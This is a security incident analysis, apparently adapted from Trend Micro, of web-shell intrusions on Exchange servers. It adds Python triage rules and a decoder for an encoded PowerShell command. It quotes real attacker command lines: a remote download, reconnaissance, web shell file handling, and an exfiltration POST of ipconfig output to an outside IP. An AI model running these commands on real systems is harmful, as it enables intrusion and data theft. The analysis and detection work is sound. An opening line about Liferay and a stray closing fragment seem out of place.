Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Trend Micro

Both servers are running Liferay CE version 6.2, which is vulnerable to CVE-2020-7961, a deserialization flaw in the Liferay JSON web services API that can lead to remote code execution.

Incident # 2

As in the first incident, the malicious actor accessed the server through a web shell and then started gathering basic information about the system. The second incident differs in that PowerShell was used for the post-exploitation activities.

Our analysis shows that a download was attempted with PowerShell's wget alias (Invoke-WebRequest, not GNU wget) from a URL on a high-numbered port (56138). Unfortunately, we have no information on what was downloaded, since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1 google.com
"c:\windows\system32\cmd.exe" /c whoami

The web shell had been dropped as errorFF.aspx.req in two locations. The copy under the IIS aspnet_client directory was then renamed to errorFF.aspx, making it executable by IIS, and the copy under the Exchange FrontEnd owa\auth directory was deleted, using the following commands:

cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"
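The command lines above (download from a high-numbered port, discovery commands, renaming and deleting the .aspx.req file) are what a triage rule set needs to catch. The following is an added example, not Trend Micro's or the Managed XDR product's logic: three rules run over constructed process-creation events that mirror the incident's command lines. The event shape (parent/image/cmdline) and the assumption that commands issued through the web shell are children of the IIS worker w3wp.exe are mine; the sample events are constructed, with the IP defanged as in the write-up.

```python
"""Triage rules for the post-exploitation command lines seen in the incident.

Added example, not Trend Micro's code. The event shape and the w3wp.exe
parent are assumptions; the sample command lines are constructed to match
the ones reported above.
"""
import re

# PowerShell's wget/iwr/curl are aliases for Invoke-WebRequest; match the cmdlet too.
DOWNLOADER = re.compile(r"\b(wget|iwr|curl|invoke-webrequest|certutil|bitsadmin)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
PORT_RE = re.compile(r"^https?://[^/:\s]+:(\d+)", re.I)
RECON = re.compile(r"\b(ipconfig|whoami|dir|ping|systeminfo|tasklist|net)\b", re.I)
FILE_OP = re.compile(r"\b(ren|rename|del|copy|move|echo)\b", re.I)
# Web directories the incident's web shell lived in (lower-case path fragments).
WEBSHELL_DIRS = (r"\inetpub\wwwroot\aspnet_client", r"\frontend\httpproxy")


def nonstandard_port_download(cmdline):
    """Return the URL when a downloader fetches from a port other than 80/443, else None."""
    if not DOWNLOADER.search(cmdline):
        return None
    for url in URL_RE.findall(cmdline):
        m = PORT_RE.match(url)
        if m and int(m.group(1)) not in (80, 443):
            return url
    return None


def webshell_file_op(cmdline):
    """Return the matched web directory when a file op touches an .aspx-named file in it."""
    if not FILE_OP.search(cmdline):
        return None
    low = cmdline.lower()
    if ".aspx" not in low:
        return None
    for d in WEBSHELL_DIRS:
        if d in low:
            return d
    return None


def triage(events, min_recon=3):
    """Run the rules over process-creation events; return (rule, detail) findings in order."""
    findings = []
    recon_from_iis = []
    for ev in events:
        cmd = ev["cmdline"]
        url = nonstandard_port_download(cmd)
        if url:
            findings.append(("download_nonstandard_port", url))
        d = webshell_file_op(cmd)
        if d:
            findings.append(("webshell_file_op", d))
        # Discovery commands are routine from an admin shell, not from the IIS worker
        # (assumption: web-shell commands are spawned by w3wp.exe).
        if ev.get("parent", "").lower() == "w3wp.exe" and RECON.search(cmd):
            recon_from_iis.append(cmd)
    if len(recon_from_iis) >= min_recon:
        findings.append(("recon_from_iis_worker", len(recon_from_iis)))
    return findings


# Constructed events mirroring the incident's command lines (IP defanged as in the write-up).
EVENTS = [
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK'},
    {"parent": "w3wp.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c ipconfig"},
    {"parent": "w3wp.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": r'"c:\windows\system32\cmd.exe" /c ping -n 1 google.com'},
    {"parent": "w3wp.exe", "image": "cmd.exe", "cmdline": r'"c:\windows\system32\cmd.exe" /c whoami'},
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx"},
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": r'"c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"'},
    # Same ping from an interactive admin session: not counted as web-shell recon.
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c ping -n 1 google.com"},
]

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule}: {detail}")
```

The recon rule is deliberately gated on the parent process rather than on the commands themselves: ipconfig, dir, ping and whoami are noise from an administrator's shell, but a run of them spawned by the IIS worker is the web shell's fingerprint. The download rule only looks at the port; the encoded command in this incident would pass it, which is why decoding -enc payloads before matching matters.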

The second use of PowerShell is more telling: the output of ipconfig /all was captured into a variable and sent to a remote host as the body of an HTTP POST issued with wget (the Invoke-WebRequest alias). The whole command was passed to PowerShell as a Base64-encoded UTF-16LE string via -exec bypass -enc, so it does not appear in clear text in the process command line.

The following shows the encoded (top) and decoded (bottom) command:

"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"
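Decoding -enc payloads is a routine triage step, and this one repays it: the destination is plain http:// on port 443, so the exfiltration looks like TLS by port alone while the ipconfig output travels in cleartext. The block below is an added example, not Trend Micro's code or tooling. It embeds the recorded command line above, decodes the -EncodedCommand argument the way PowerShell does (Base64 of UTF-16LE) and pulls out the request details. The argument-prefix matching (-e, -ec, -en, -enc, -encodedcommand) and the regexes for URL, method and body variable are my assumptions.

```python
"""Decode a PowerShell -EncodedCommand payload and extract the request it makes.

Added example, not Trend Micro's code. The command line is the one recorded in
the incident (quotes and backslashes normalised); the argument matching and the
IOC extraction rules are assumptions of this example.
"""
import base64
import re

# Recorded command line from the incident, split here only for line length.
CMDLINE = (
    r'"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc '
    "JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBn"
    "AGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQA"
    "MwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0"
    "ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEA"
    "dABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA"
)

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; -exec (ExecutionPolicy)
# must not match, which the required whitespace after the flag takes care of.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
HOST_PORT_RE = re.compile(r"^(https?)://([^/?:\s]+)(?::(\d+))?", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand: Base64 over UTF-16LE, as PowerShell expects."""
    m = ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # some log pipelines drop trailing '=' padding
    return base64.b64decode(b64).decode("utf-16-le")


def extract_exfil(script):
    """Summarise the HTTP request a decoded script makes: where, how, and what it sends."""
    url = URL_RE.search(script)
    if not url:
        return {}
    url = url.group(0)
    scheme, host, port = HOST_PORT_RE.match(url).groups()
    scheme = scheme.lower()
    port = int(port) if port else (443 if scheme == "https" else 80)
    method = re.search(r"-Method\s+(\w+)", script, re.I)
    body = re.search(r"-Body\s+(\$\w+)", script, re.I)
    return {
        "url": url,
        "scheme": scheme,
        "host": host,
        "port": port,
        "method": method.group(1).upper() if method else "GET",
        "body_var": body.group(1) if body else None,
        # Port looks like TLS, traffic is not: a blending trick worth flagging on its own.
        "cleartext_on_tls_port": scheme == "http" and port == 443,
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(CMDLINE)
    print(decoded)
    for k, v in extract_exfil(decoded).items():
        print(f"{k}: {v}")
```

Run on the recorded command line, the decoder returns exactly the decoded line shown above, and the summary reports host 91.92.136.250, port 443, method POST, body $r and cleartext_on_tls_port set. A network-side check for the same thing is a non-TLS ClientHello-less flow to tcp/443 from the Exchange server.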

Mimikatz,

Read More: https://www.trendmicro.com/en_us/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html